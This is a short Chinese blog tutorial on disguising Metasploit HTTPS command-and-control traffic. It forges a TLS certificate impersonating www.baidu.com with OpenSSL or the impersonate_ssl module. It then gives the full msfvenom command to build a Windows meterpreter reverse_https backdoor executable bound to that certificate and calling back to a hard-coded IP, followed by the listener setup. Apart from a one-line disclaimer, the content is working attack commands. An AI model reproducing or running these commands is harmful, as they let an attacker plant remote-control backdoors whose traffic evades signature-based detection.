MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

免责声明:本文仅做技术交流与学习...

目录

步骤:

[1-利用 openssl 生成证书](#1-利用 openssl 生成证书)

[1-impersonate_ssl 模块 --生成证书](#1-impersonate_ssl 模块 --生成证书)

​编辑

[2.MSF 生成绑定证书后门:](#2.MSF 生成绑定证书后门:)

[3.MSF 监听上线:](#3.MSF 监听上线:)

证书伪造

https流量加密


-解决 HTTPS-SSL 通讯证书被特征标示问题

步骤:

1-利用 openssl 生成证书

复制代码
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 --生成证书

复制代码
此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块,可以用来自动从信任源创建一个虚假证书,十分方便: 
use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com 
run 
--->.pem


2.MSF 生成绑定证书后门:

复制代码
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell 
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe 

3.MSF 监听上线:

复制代码
use exploit/multi/handler 
set payload windows/meterpreter/reverse_https 
set lhost 0.0.0.0 
set lport 5566 
set HandlerSSLCert /root/www.baidu.com.pem 
set StagerVerifySSLCert true 
run 

---可以访问https看看证书

证书伪造


https流量加密


相关推荐
用户9623779544814 小时前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
茶杯梦轩2 天前
从零起步学习RabbitMQ || 第二章:RabbitMQ 深入理解概念 Producer、Consumer、Exchange、Queue 与企业实战案例
服务器·后端·消息队列
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
YuMiao4 天前
gstatic连接问题导致Google Gemini / Studio页面乱码或图标缺失问题
服务器·网络协议